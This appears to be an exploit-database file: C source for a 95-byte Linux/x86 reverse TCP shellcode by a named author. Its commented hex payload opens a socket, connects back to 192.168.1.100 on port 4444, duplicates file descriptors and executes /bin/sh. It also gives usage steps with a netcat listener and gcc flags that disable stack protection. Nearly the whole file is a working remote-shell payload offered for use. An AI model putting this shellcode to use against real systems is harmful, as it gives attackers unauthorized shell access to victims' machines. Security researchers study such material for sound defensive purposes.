6d030b37a6
6 changes to exploits/shellcodes/ghdb Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) Linux/x86 - Reverse TCP Shellcode (95 bytes) Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes) Windows 11 x64 - Reverse TCP Shellcode (564 bytes)
43 lines
No EOL
1.4 KiB
C
43 lines
No EOL
1.4 KiB
C
/*
|
|
# Exploit Title: Linux/x86 - Reverse TCP Shellcode (95 bytes)
|
|
# Date: 2025-04-06
|
|
# Exploit Author: Al Baradi Joy
|
|
# Platform: Linux x86
|
|
# Type: Shellcode
|
|
# Shellcode Length: 95 bytes
|
|
# Tested On: Kali Linux x86
|
|
# Connect-Back IP: 192.168.1.100
|
|
# Connect-Back Port: 4444
|
|
|
|
Description:
|
|
This is a null-free reverse TCP shell shellcode for Linux x86 that connects back to 192.168.1.100:4444 and spawns a /bin/sh shell. Useful in remote code execution exploits for getting a remote shell.
|
|
|
|
Usage:
|
|
Start a netcat listener on your attacking machine:
|
|
nc -lvnp 4444
|
|
|
|
Compile and run on the target machine:
|
|
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
|
|
./shellcode
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
unsigned char shellcode[] =
|
|
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" // zero out registers
|
|
"\x50\x6a\x01\x6a\x02\x89\xe1\xb0\x66" // socket syscall
|
|
"\xcd\x80\x89\xc6\x31\xc0\x68\xc0\xa8\x01\x64" // push IP: 192.168.1.100
|
|
"\x66\x68\x11\x5c" // push port 4444
|
|
"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56"
|
|
"\x89\xe1\xb0\x66\xb3\x03\xcd\x80" // connect
|
|
"\x31\xc9\xb1\x02\x89\xf3\xb0\x3f" // dup2 loop
|
|
"\xcd\x80\x49\x79\xf9"
|
|
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
|
|
"\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"; // execve("/bin/sh")
|
|
|
|
int main() {
|
|
printf("Shellcode Length: %zu\n", strlen(shellcode));
|
|
int (*ret)() = (int(*)())shellcode;
|
|
ret();
|
|
} |